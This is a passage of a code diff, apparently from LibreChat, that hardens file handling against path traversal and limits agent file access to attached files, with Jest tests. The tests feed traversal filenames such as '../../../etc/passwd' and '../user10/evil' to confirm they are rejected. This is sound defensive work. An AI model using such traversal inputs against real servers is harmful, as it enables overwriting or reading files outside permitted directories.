callCount++; + return callCount === 1 + ? 
Promise.resolve(makePrimaryConfig(edges)) + : Promise.resolve(handoffConfig); + }); + + await initializeClient({ + req: makeReq(), + res: {}, + signal: new AbortController().signal, + endpointOption: makeEndpointOption(), + }); + + expect(mockInitializeAgent).toHaveBeenCalledTimes(2); + expect(agentClientArgs.agent.edges).toHaveLength(1); + expect(agentClientArgs.agent.edges[0].to).toBe(AUTHORIZED_ID); + }); +}); diff --git a/api/server/services/Files/Code/__tests__/process-traversal.spec.js b/api/server/services/Files/Code/__tests__/process-traversal.spec.js new file mode 100644 index 0000000000..2db366d06b --- /dev/null +++ b/api/server/services/Files/Code/__tests__/process-traversal.spec.js @@ -0,0 +1,124 @@ +jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') })); + +jest.mock('@librechat/data-schemas', () => ({ + logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() }, +})); + +jest.mock('@librechat/agents', () => ({ + getCodeBaseURL: jest.fn(() => 'http://localhost:8000'), +})); + +const mockSanitizeFilename = jest.fn(); + +jest.mock('@librechat/api', () => ({ + logAxiosError: jest.fn(), + getBasePath: jest.fn(() => ''), + sanitizeFilename: mockSanitizeFilename, +})); + +jest.mock('librechat-data-provider', () => ({ + ...jest.requireActual('librechat-data-provider'), + mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })), + getEndpointFileConfig: jest.fn(() => ({ + fileSizeLimit: 100 * 1024 * 1024, + supportedMimeTypes: ['*/*'], + })), + fileConfig: { checkType: jest.fn(() => true) }, +})); + +jest.mock('~/models', () => ({ + createFile: jest.fn().mockResolvedValue({}), + getFiles: jest.fn().mockResolvedValue([]), + updateFile: jest.fn(), + claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }), +})); + +const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv'); + +jest.mock('~/server/services/Files/strategies', () => ({ + getStrategyFunctions: jest.fn(() => ({ + 
saveBuffer: mockSaveBuffer, + })), +})); + +jest.mock('~/server/services/Files/permissions', () => ({ + filterFilesByAgentAccess: jest.fn().mockResolvedValue([]), +})); + +jest.mock('~/server/services/Files/images/convert', () => ({ + convertImage: jest.fn(), +})); + +jest.mock('~/server/utils', () => ({ + determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }), +})); + +jest.mock('axios', () => + jest.fn().mockResolvedValue({ + data: Buffer.from('file-content'), + }), +); + +const { createFile } = require('~/models'); +const { processCodeOutput } = require('../process'); + +const baseParams = { + req: { + user: { id: 'user123' }, + config: { + fileStrategy: 'local', + imageOutputType: 'webp', + fileConfig: {}, + }, + }, + id: 'code-file-id', + apiKey: 'test-key', + toolCallId: 'tool-1', + conversationId: 'conv-1', + messageId: 'msg-1', + session_id: 'session-1', +}; + +describe('processCodeOutput path traversal protection', () => { + beforeEach(() => { + jest.clearAllMocks(); + }); + + test('sanitizeFilename is called with the raw artifact name', async () => { + mockSanitizeFilename.mockReturnValueOnce('output.csv'); + await processCodeOutput({ ...baseParams, name: 'output.csv' }); + expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv'); + }); + + test('sanitized name is used in saveBuffer fileName', async () => { + mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt'); + await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' }); + + expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt'); + const call = mockSaveBuffer.mock.calls[0][0]; + expect(call.fileName).toBe('mock-uuid__sanitized-name.txt'); + }); + + test('sanitized name is stored as filename in the file record', async () => { + mockSanitizeFilename.mockReturnValueOnce('safe-output.csv'); + await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' }); + + const fileArg = createFile.mock.calls[0][0]; + 
expect(fileArg.filename).toBe('safe-output.csv'); + }); + + test('sanitized name is used for image file records', async () => { + const { convertImage } = require('~/server/services/Files/images/convert'); + convertImage.mockResolvedValueOnce({ + filepath: '/images/user123/mock-uuid.webp', + bytes: 100, + }); + + mockSanitizeFilename.mockReturnValueOnce('safe-chart.png'); + await processCodeOutput({ ...baseParams, name: '../../../chart.png' }); + + expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png'); + const fileArg = createFile.mock.calls[0][0]; + expect(fileArg.filename).toBe('safe-chart.png'); + }); +}); diff --git a/api/server/services/Files/Code/process.js b/api/server/services/Files/Code/process.js index 3f0bfcfc87..e878b00255 100644 --- a/api/server/services/Files/Code/process.js +++ b/api/server/services/Files/Code/process.js @@ -3,7 +3,7 @@ const { v4 } = require('uuid'); const axios = require('axios'); const { logger } = require('@librechat/data-schemas'); const { getCodeBaseURL } = require('@librechat/agents'); -const { logAxiosError, getBasePath } = require('@librechat/api'); +const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api'); const { Tools, megabyte, @@ -146,6 +146,13 @@ const processCodeOutput = async ({ ); } + const safeName = sanitizeFilename(name); + if (safeName !== name) { + logger.warn( + `[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`, + ); + } + if (isImage) { const usage = isUpdate ? (claimed.usage ?? 
0) + 1 : 1; const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`); @@ -156,7 +163,7 @@ const processCodeOutput = async ({ file_id, messageId, usage, - filename: name, + filename: safeName, conversationId, user: req.user.id, type: `image/${appConfig.imageOutputType}`, @@ -200,7 +207,7 @@ const processCodeOutput = async ({ ); } - const fileName = `${file_id}__${name}`; + const fileName = `${file_id}__${safeName}`; const filepath = await saveBuffer({ userId: req.user.id, buffer, @@ -213,7 +220,7 @@ const processCodeOutput = async ({ filepath, messageId, object: 'file', - filename: name, + filename: safeName, type: mimeType, conversationId, user: req.user.id, @@ -229,6 +236,11 @@ const processCodeOutput = async ({ await createFile(file, true); return Object.assign(file, { messageId, toolCallId }); } catch (error) { + if (error?.message === 'Path traversal detected in filename') { + logger.warn( + `[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`, + ); + } logAxiosError({ message: 'Error downloading/processing code environment file', error, diff --git a/api/server/services/Files/Code/process.spec.js b/api/server/services/Files/Code/process.spec.js index f01a623f90..b89a6c6307 100644 --- a/api/server/services/Files/Code/process.spec.js +++ b/api/server/services/Files/Code/process.spec.js @@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({ jest.mock('@librechat/api', () => ({ logAxiosError: jest.fn(), getBasePath: jest.fn(() => ''), + sanitizeFilename: jest.fn((name) => name), })); // Mock models diff --git a/api/server/services/Files/Local/__tests__/crud-traversal.spec.js b/api/server/services/Files/Local/__tests__/crud-traversal.spec.js new file mode 100644 index 0000000000..57ba221d68 --- /dev/null +++ b/api/server/services/Files/Local/__tests__/crud-traversal.spec.js @@ -0,0 +1,69 @@ +jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() })); +jest.mock('@librechat/data-schemas', () => ({ + 
logger: { warn: jest.fn(), error: jest.fn() }, +})); + +const mockTmpBase = require('fs').mkdtempSync( + require('path').join(require('os').tmpdir(), 'crud-traversal-'), +); + +jest.mock('~/config/paths', () => { + const path = require('path'); + return { + publicPath: path.join(mockTmpBase, 'public'), + uploads: path.join(mockTmpBase, 'uploads'), + }; +}); + +const fs = require('fs'); +const path = require('path'); +const { saveLocalBuffer } = require('../crud'); + +describe('saveLocalBuffer path containment', () => { + beforeAll(() => { + fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true }); + fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true }); + }); + + afterAll(() => { + fs.rmSync(mockTmpBase, { recursive: true, force: true }); + }); + + test('rejects filenames with path traversal sequences', async () => { + await expect( + saveLocalBuffer({ + userId: 'user1', + buffer: Buffer.from('malicious'), + fileName: '../../../etc/passwd', + basePath: 'uploads', + }), + ).rejects.toThrow('Path traversal detected in filename'); + }); + + test('rejects prefix-collision traversal (startsWith bypass)', async () => { + fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true }); + await expect( + saveLocalBuffer({ + userId: 'user1', + buffer: Buffer.from('malicious'), + fileName: '../user10/evil', + basePath: 'uploads', + }), + ).rejects.toThrow('Path traversal detected in filename'); + }); + + test('allows normal filenames', async () => { + const result = await saveLocalBuffer({ + userId: 'user1', + buffer: Buffer.from('safe content'), + fileName: 'file-id__output.csv', + basePath: 'uploads', + }); + + expect(result).toBe('/uploads/user1/file-id__output.csv'); + + const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv'); + expect(fs.existsSync(filePath)).toBe(true); + fs.unlinkSync(filePath); + }); +}); diff --git a/api/server/services/Files/Local/crud.js 
b/api/server/services/Files/Local/crud.js index 1f38a01f83..c86774d472 100644 --- a/api/server/services/Files/Local/crud.js +++ b/api/server/services/Files/Local/crud.js @@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' } fs.mkdirSync(directoryPath, { recursive: true }); } - fs.writeFileSync(path.join(directoryPath, fileName), buffer); + const resolvedDir = path.resolve(directoryPath); + const resolvedPath = path.resolve(resolvedDir, fileName); + const rel = path.relative(resolvedDir, resolvedPath); + if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) { + throw new Error('Path traversal detected in filename'); + } + fs.writeFileSync(resolvedPath, buffer); const filePath = path.posix.join('/', basePath, userId, fileName); @@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) { } /** - * Validates if a given filepath is within a specified subdirectory under a base path. This function constructs - * the expected base path using the base, subfolder, and user id from the request, and then checks if the - * provided filepath starts with this constructed base path. + * Validates that a filepath is strictly contained within a subdirectory under a base path, + * using path.relative to prevent prefix-collision bypasses. * * @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`. * @param {string} base - The base directory path. 
@@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) { const isValidPath = (req, base, subfolder, filepath) => { const normalizedBase = path.resolve(base, subfolder, req.user.id); const normalizedFilepath = path.resolve(filepath); - return normalizedFilepath.startsWith(normalizedBase); + const rel = path.relative(normalizedBase, normalizedFilepath); + return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`); }; /** diff --git a/api/server/services/Files/permissions.js b/api/server/services/Files/permissions.js index d909afe25a..b9a5d6656f 100644 --- a/api/server/services/Files/permissions.js +++ b/api/server/services/Files/permissions.js @@ -1,10 +1,29 @@ const { logger } = require('@librechat/data-schemas'); -const { PermissionBits, ResourceType } = require('librechat-data-provider'); +const { PermissionBits, ResourceType, isEphemeralAgentId } = require('librechat-data-provider'); const { checkPermission } = require('~/server/services/PermissionService'); const { getAgent } = require('~/models/Agent'); /** - * Checks if a user has access to multiple files through a shared agent (batch operation) + * @param {Object} agent - The agent document (lean) + * @returns {Set} All file IDs attached across all resource types + */ +function getAttachedFileIds(agent) { + const attachedFileIds = new Set(); + if (agent.tool_resources) { + for (const resource of Object.values(agent.tool_resources)) { + if (resource?.file_ids && Array.isArray(resource.file_ids)) { + for (const fileId of resource.file_ids) { + attachedFileIds.add(fileId); + } + } + } + } + return attachedFileIds; +} + +/** + * Checks if a user has access to multiple files through a shared agent (batch operation). + * Access is always scoped to files actually attached to the agent's tool_resources. 
* @param {Object} params - Parameters object * @param {string} params.userId - The user ID to check access for * @param {string} [params.role] - Optional user role to avoid DB query @@ -16,7 +35,6 @@ const { getAgent } = require('~/models/Agent'); const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => { const accessMap = new Map(); - // Initialize all files as no access fileIds.forEach((fileId) => accessMap.set(fileId, false)); try { @@ -26,13 +44,17 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele return accessMap; } - // Check if user is the author - if so, grant access to all files + const attachedFileIds = getAttachedFileIds(agent); + if (agent.author.toString() === userId.toString()) { - fileIds.forEach((fileId) => accessMap.set(fileId, true)); + fileIds.forEach((fileId) => { + if (attachedFileIds.has(fileId)) { + accessMap.set(fileId, true); + } + }); return accessMap; } - // Check if user has at least VIEW permission on the agent const hasViewPermission = await checkPermission({ userId, role, @@ -46,7 +68,6 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele } if (isDelete) { - // Check if user has EDIT permission (which would indicate collaborative access) const hasEditPermission = await checkPermission({ userId, role, @@ -55,23 +76,11 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele requiredPermission: PermissionBits.EDIT, }); - // If user only has VIEW permission, they can't access files - // Only users with EDIT permission or higher can access agent files if (!hasEditPermission) { return accessMap; } } - const attachedFileIds = new Set(); - if (agent.tool_resources) { - for (const [_resourceType, resource] of Object.entries(agent.tool_resources)) { - if (resource?.file_ids && Array.isArray(resource.file_ids)) { - resource.file_ids.forEach((fileId) => attachedFileIds.add(fileId)); - } - } - } - - // Grant access only to 
files that are attached to this agent fileIds.forEach((fileId) => { if (attachedFileIds.has(fileId)) { accessMap.set(fileId, true); @@ -95,7 +104,7 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele * @returns {Promise>} Filtered array of accessible files */ const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => { - if (!userId || !agentId || !files || files.length === 0) { + if (!userId || !agentId || !files || files.length === 0 || isEphemeralAgentId(agentId)) { return files; } diff --git a/api/server/services/Files/permissions.spec.js b/api/server/services/Files/permissions.spec.js new file mode 100644 index 0000000000..85e7b2dc5b --- /dev/null +++ b/api/server/services/Files/permissions.spec.js @@ -0,0 +1,409 @@ +jest.mock('@librechat/data-schemas', () => ({ + logger: { error: jest.fn() }, +})); + +jest.mock('~/server/services/PermissionService', () => ({ + checkPermission: jest.fn(), +})); + +jest.mock('~/models/Agent', () => ({ + getAgent: jest.fn(), +})); + +const { logger } = require('@librechat/data-schemas'); +const { Constants, PermissionBits, ResourceType } = require('librechat-data-provider'); +const { checkPermission } = require('~/server/services/PermissionService'); +const { getAgent } = require('~/models/Agent'); +const { filterFilesByAgentAccess, hasAccessToFilesViaAgent } = require('./permissions'); + +const AUTHOR_ID = 'author-user-id'; +const USER_ID = 'viewer-user-id'; +const AGENT_ID = 'agent_test-abc123'; +const AGENT_MONGO_ID = 'mongo-agent-id'; + +function makeFile(file_id, user) { + return { file_id, user, filename: `${file_id}.txt` }; +} + +function makeAgent(overrides = {}) { + return { + _id: AGENT_MONGO_ID, + id: AGENT_ID, + author: AUTHOR_ID, + tool_resources: { + file_search: { file_ids: ['attached-1', 'attached-2'] }, + execute_code: { file_ids: ['attached-3'] }, + }, + ...overrides, + }; +} + +beforeEach(() => { + jest.clearAllMocks(); +}); + 
+describe('filterFilesByAgentAccess', () => { + describe('early returns (no DB calls)', () => { + it('should return files unfiltered for ephemeral agentId', async () => { + const files = [makeFile('f1', 'other-user')]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: Constants.EPHEMERAL_AGENT_ID, + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return files unfiltered for non-agent_ prefixed agentId', async () => { + const files = [makeFile('f1', 'other-user')]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: 'custom-memory-id', + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return files when userId is missing', async () => { + const files = [makeFile('f1', 'someone')]; + const result = await filterFilesByAgentAccess({ + files, + userId: undefined, + agentId: AGENT_ID, + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return files when agentId is missing', async () => { + const files = [makeFile('f1', 'someone')]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: undefined, + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return empty array when files is empty', async () => { + const result = await filterFilesByAgentAccess({ + files: [], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return undefined when files is nullish', async () => { + const result = await filterFilesByAgentAccess({ + files: null, + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toBeNull(); + expect(getAgent).not.toHaveBeenCalled(); + }); + }); + + describe('all files owned by userId', () => { + it('should return all files without calling getAgent', async () 
=> { + const files = [makeFile('f1', USER_ID), makeFile('f2', USER_ID)]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + }); + + describe('mixed owned and non-owned files', () => { + const ownedFile = makeFile('owned-1', USER_ID); + const sharedFile = makeFile('attached-1', AUTHOR_ID); + const unattachedFile = makeFile('not-attached', AUTHOR_ID); + + it('should return owned + accessible non-owned files when user has VIEW', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile, unattachedFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toHaveLength(2); + expect(result.map((f) => f.file_id)).toContain('owned-1'); + expect(result.map((f) => f.file_id)).toContain('attached-1'); + expect(result.map((f) => f.file_id)).not.toContain('not-attached'); + }); + + it('should return only owned files when user lacks VIEW permission', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(false); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toEqual([ownedFile]); + }); + + it('should return only owned files when agent is not found', async () => { + getAgent.mockResolvedValue(null); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([ownedFile]); + }); + + it('should return only owned files on DB error (fail-closed)', async () => { + getAgent.mockRejectedValue(new Error('DB connection lost')); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile], + userId: USER_ID, + agentId: 
AGENT_ID, + }); + + expect(result).toEqual([ownedFile]); + expect(logger.error).toHaveBeenCalled(); + }); + }); + + describe('file with no user field', () => { + it('should treat file as non-owned and run through access check', async () => { + const noUserFile = makeFile('attached-1', undefined); + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [noUserFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(getAgent).toHaveBeenCalled(); + expect(result).toEqual([noUserFile]); + }); + + it('should exclude file with no user field when not attached to agent', async () => { + const noUserFile = makeFile('not-attached', null); + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [noUserFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + }); + }); + + describe('no owned files (all non-owned)', () => { + const file1 = makeFile('attached-1', AUTHOR_ID); + const file2 = makeFile('not-attached', AUTHOR_ID); + + it('should return only attached files when user has VIEW', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [file1, file2], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toEqual([file1]); + }); + + it('should return empty array when no VIEW permission', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(false); + + const result = await filterFilesByAgentAccess({ + files: [file1, file2], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + }); + + it('should return empty array when agent not found', async () => { + getAgent.mockResolvedValue(null); + + const result = await 
filterFilesByAgentAccess({ + files: [file1], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + }); + }); +}); + +describe('hasAccessToFilesViaAgent', () => { + describe('agent not found', () => { + it('should return all-false map', async () => { + getAgent.mockResolvedValue(null); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['f1', 'f2'], + agentId: AGENT_ID, + }); + + expect(result.get('f1')).toBe(false); + expect(result.get('f2')).toBe(false); + }); + }); + + describe('author path', () => { + it('should grant access to attached files for the agent author', async () => { + getAgent.mockResolvedValue(makeAgent()); + + const result = await hasAccessToFilesViaAgent({ + userId: AUTHOR_ID, + fileIds: ['attached-1', 'not-attached'], + agentId: AGENT_ID, + }); + + expect(result.get('attached-1')).toBe(true); + expect(result.get('not-attached')).toBe(false); + expect(checkPermission).not.toHaveBeenCalled(); + }); + }); + + describe('VIEW permission path', () => { + it('should grant access to attached files for viewer with VIEW permission', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + role: 'USER', + fileIds: ['attached-1', 'attached-3', 'not-attached'], + agentId: AGENT_ID, + }); + + expect(result.get('attached-1')).toBe(true); + expect(result.get('attached-3')).toBe(true); + expect(result.get('not-attached')).toBe(false); + + expect(checkPermission).toHaveBeenCalledWith({ + userId: USER_ID, + role: 'USER', + resourceType: ResourceType.AGENT, + resourceId: AGENT_MONGO_ID, + requiredPermission: PermissionBits.VIEW, + }); + }); + + it('should deny all when VIEW permission is missing', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(false); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['attached-1'], + 
agentId: AGENT_ID, + }); + + expect(result.get('attached-1')).toBe(false); + }); + }); + + describe('delete path (EDIT permission required)', () => { + it('should grant access when both VIEW and EDIT pass', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(true); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['attached-1'], + agentId: AGENT_ID, + isDelete: true, + }); + + expect(result.get('attached-1')).toBe(true); + expect(checkPermission).toHaveBeenCalledTimes(2); + expect(checkPermission).toHaveBeenLastCalledWith( + expect.objectContaining({ requiredPermission: PermissionBits.EDIT }), + ); + }); + + it('should deny all when VIEW passes but EDIT fails', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(false); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['attached-1'], + agentId: AGENT_ID, + isDelete: true, + }); + + expect(result.get('attached-1')).toBe(false); + }); + }); + + describe('error handling', () => { + it('should return all-false map on DB error (fail-closed)', async () => { + getAgent.mockRejectedValue(new Error('connection refused')); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['f1', 'f2'], + agentId: AGENT_ID, + }); + + expect(result.get('f1')).toBe(false); + expect(result.get('f2')).toBe(false); + expect(logger.error).toHaveBeenCalledWith( + '[hasAccessToFilesViaAgent] Error checking file access:', + expect.any(Error), + ); + }); + }); + + describe('agent with no tool_resources', () => { + it('should deny all files even for the author', async () => { + getAgent.mockResolvedValue(makeAgent({ tool_resources: undefined })); + + const result = await hasAccessToFilesViaAgent({ + userId: AUTHOR_ID, + fileIds: ['f1'], + agentId: AGENT_ID, + }); + + expect(result.get('f1')).toBe(false); + }); + 
}); +}); diff --git a/api/server/services/ToolService.js b/api/server/services/ToolService.js index 62499348e6..ca75e7eb4f 100644 --- a/api/server/services/ToolService.js +++ b/api/server/services/ToolService.js @@ -42,6 +42,7 @@ const { } = require('librechat-data-provider'); const { createActionTool, + legacyDomainEncode, decryptMetadata, loadActionSets, domainParser, @@ -64,6 +65,28 @@ const { redactMessage } = require('~/config/parsers'); const { findPluginAuthsByKeys } = require('~/models'); const { getFlowStateManager } = require('~/config'); const { getLogStores } = require('~/cache'); + +const domainSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); + +/** + * Resolves the set of enabled agent capabilities from endpoints config, + * falling back to app-level or default capabilities for ephemeral agents. + * @param {ServerRequest} req + * @param {Object} appConfig + * @param {string} agentId + * @returns {Promise<Set<string>>} + */ +async function resolveAgentCapabilities(req, appConfig, agentId) { + const endpointsConfig = await getEndpointsConfig(req); + let capabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []); + if (capabilities.size === 0 && isEphemeralAgentId(agentId)) { + capabilities = new Set( + appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities, + ); + } + return capabilities; +} + /** * Processes the required actions by calling the appropriate tools and returning the outputs. * @param {OpenAIClient} client - OpenAI or StreamRunManager Client. 
@@ -152,8 +175,7 @@ async function processRequiredActions(client, requiredActions) { const promises = []; - /** @type {Action[]} */ - let actionSets = []; + let actionSetsData = null; let isActionTool = false; const ActionToolMap = {}; const ActionBuildersMap = {}; @@ -239,9 +261,9 @@ async function processRequiredActions(client, requiredActions) { if (!tool) { // throw new Error(`Tool ${currentAction.tool} not found.`); - // Load all action sets once if not already loaded - if (!actionSets.length) { - actionSets = + if (!actionSetsData) { + /** @type {Action[]} */ + const actionSets = (await loadActionSets({ assistant_id: client.req.body.assistant_id, })) ?? []; @@ -249,11 +271,16 @@ async function processRequiredActions(client, requiredActions) { // Process all action sets once // Map domains to their processed action sets const processedDomains = new Map(); - const domainMap = new Map(); + const domainLookupMap = new Map(); for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); - domainMap.set(domain, action); + domainLookupMap.set(domain, domain); + + const legacyDomain = legacyDomainEncode(action.metadata.domain); + if (legacyDomain !== domain) { + domainLookupMap.set(legacyDomain, domain); + } const isDomainAllowed = await isActionDomainAllowed( action.metadata.domain, @@ -308,27 +335,26 @@ async function processRequiredActions(client, requiredActions) { ActionBuildersMap[action.metadata.domain] = requestBuilders; } - // Update actionSets reference to use the domain map - actionSets = { domainMap, processedDomains }; + actionSetsData = { domainLookupMap, processedDomains }; } - // Find the matching domain for this tool let currentDomain = ''; - for (const domain of actionSets.domainMap.keys()) { - if (currentAction.tool.includes(domain)) { - currentDomain = domain; + let matchedKey = ''; + for (const [key, canonical] of actionSetsData.domainLookupMap.entries()) { + if (currentAction.tool.includes(key)) { + 
currentDomain = canonical; + matchedKey = key; break; } } - if (!currentDomain || !actionSets.processedDomains.has(currentDomain)) { - // TODO: try `function` if no action set is found - // throw new Error(`Tool ${currentAction.tool} not found.`); + if (!currentDomain || !actionSetsData.processedDomains.has(currentDomain)) { continue; } - const { action, requestBuilders, encrypted } = actionSets.processedDomains.get(currentDomain); - const functionName = currentAction.tool.replace(`${actionDelimiter}${currentDomain}`, ''); + const { action, requestBuilders, encrypted } = + actionSetsData.processedDomains.get(currentDomain); + const functionName = currentAction.tool.replace(`${actionDelimiter}${matchedKey}`, ''); const requestBuilder = requestBuilders[functionName]; if (!requestBuilder) { @@ -445,17 +471,11 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to } const appConfig = req.config; - const endpointsConfig = await getEndpointsConfig(req); - let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []); - - if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) { - enabledCapabilities = new Set( - appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? 
defaultAgentCapabilities, - ); - } + const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id); const checkCapability = (capability) => enabledCapabilities.has(capability); const areToolsEnabled = checkCapability(AgentCapabilities.tools); + const actionsEnabled = checkCapability(AgentCapabilities.actions); const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools); const filteredTools = agent.tools?.filter((tool) => { @@ -468,7 +488,10 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to if (tool === Tools.web_search) { return checkCapability(AgentCapabilities.web_search); } - if (!areToolsEnabled && !tool.includes(actionDelimiter)) { + if (tool.includes(actionDelimiter)) { + return actionsEnabled; + } + if (!areToolsEnabled) { return false; } return true; @@ -569,12 +592,17 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to const definitions = []; const allowedDomains = appConfig?.actions?.allowedDomains; - const domainSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); + const normalizedToolNames = new Set( + actionToolNames.map((n) => n.replace(domainSeparatorRegex, '_')), + ); for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); const normalizedDomain = domain.replace(domainSeparatorRegex, '_'); + const legacyDomain = legacyDomainEncode(action.metadata.domain); + const legacyNormalized = legacyDomain.replace(domainSeparatorRegex, '_'); + const isDomainAllowed = await isActionDomainAllowed(action.metadata.domain, allowedDomains); if (!isDomainAllowed) { logger.warn( @@ -594,7 +622,8 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to for (const sig of functionSignatures) { const toolName = `${sig.name}${actionDelimiter}${normalizedDomain}`; - if (!actionToolNames.some((name) => name.replace(domainSeparatorRegex, '_') === toolName)) { + const legacyToolName = 
